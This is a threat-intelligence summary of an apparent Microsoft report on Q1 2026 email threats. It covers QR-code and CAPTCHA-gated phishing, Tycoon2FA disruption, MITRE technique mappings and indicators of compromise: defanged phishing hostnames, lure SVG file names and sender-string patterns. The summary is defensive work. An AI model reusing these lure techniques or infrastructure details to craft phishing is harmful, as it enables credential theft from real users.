Microsoft observed Q1 2026 email threat activity dominated by a surge in QR-code and CAPTCHA‑gated phishing, widespread credential-harvesting payloads, and persistent BEC activity totaling about 10.7 million attacks. Disruption of the Tycoon2FA PhaaS in early March reduced access to active phishing pages and email volumes temporarily, though the actor adapted by changing hosting providers and TLD registration patterns. #Tycoon2FA #Storm-1747
Keypoints
- Microsoft’s disruption of Tycoon2FA in early March sharply reduced phishing page availability and contributed to a 15% drop in Tycoon2FA‑linked messages for March.
- QR code phishing surged 146% across Q1 2026 (7.6M → 18.7M), with PDF attachments the dominant delivery method and email‑embedded QR codes growing rapidly.
- CAPTCHA‑gated phishing more than doubled in March (+125%) to 11.9M attacks as adversaries used fake CAPTCHAs to evade automated scanning and increase user interaction.
- Malicious payloads were overwhelmingly credential phishing (≈94% by March), with volatile use of HTML, PDF, SVG, DOC/DOCX, and compressed attachments to deliver content.
- Large, concentrated campaigns (multi‑million messages) abused varied PhaaS providers—Tycoon2FA, Kratos, and EvilTokens—to host final phishing payloads and staging pages.
- BEC remained prevalent (≈10.7M attacks in Q1), dominated by low-effort generic outreach messages (82–84%), with transactional pretexts and occasional seasonal shifts in financial request types.
- Tycoon2FA infrastructure trends shifted across Q1: new generic TLDs in January/February, then a post‑disruption increase in .RU registrations and migration away from Cloudflare hosting.
MITRE Techniques
- [T1557 ] Adversary-in-the-middle – Used to defeat non-phishing-resistant MFA by mediating sign-in flows in phishing kits; quote (‘leveraging adversary-in-the-middle (AiTM) techniques to attempt to defeat non-phishing-resistant multifactor authentication (MFA) defenses.’)
- [T1566 ] Phishing – Broad email-based credential harvesting campaigns using attachments, embedded QR codes, and staged landing pages; quote (‘QR codes have rapidly emerged as a preferred tool among phishing threat actors seeking to bypass traditional email defenses.’)
- [T1566.001 ] Phishing Attachment – Delivery of malicious HTML, PDF, SVG, DOC/DOCX, and ZIP attachments that launch local redirectors or staged pages; quote (‘PDF attachments were the dominant delivery method throughout the quarter, growing from 65% of QR code attacks in January to 70% in March.’)
- [T1566.002 ] Phishing Link – Use of embedded URLs and QR codes in email bodies to redirect users to phishing sites and bypass text-based scanning; quote (’emergence of QR codes embedded directly in email bodies, which surged 336% in March.’)
- [T1204 ] User Execution – Reliance on user actions (opening attachments, completing fake CAPTCHAs) to trigger payload retrieval and credential capture; quote (‘If an attached SVG file was opened, the user’s browser would open locally and fetch content from one of the three following hostnames’).
Indicators of Compromise
- [Domain / Hostname ] phishing hosting and staging – bouleversement.niovapahrm[.]com, haematogenesis.hvishay[.]com, and 1 more host used to serve CAPTCHA and staging pages.
- [File name ] malicious SVG attachment patterns – _statements_inv_.svg; PLAY_AUDIO_MESSAGE____241.svg (used in a 1.2M‑message campaign).
- [Top-level domain ] registration patterns linked to Tycoon2FA infrastructure – .DIGITAL (newer TLD usage), and .RU (over 41% of Tycoon2FA domains since late March).
- [Email sender usernames ] suspicious long, keyword‑stuffed senders used in HTML campaign delivery – eReceipt_Payment_Alert_Noreply-/m939k6d7.r.us-west-2.awstrack.me/…, DocExchange_Noreply-m939k6d7.r.us_west_2.awstrack.me/… (examples of embedded URLs/tracking in sender strings).
- [Attachment file types ] malicious payload delivery formats – HTML attachments, PDF attachments (dominant for QR/CAPTCHA campaigns), and SVG files used to fetch phishing content.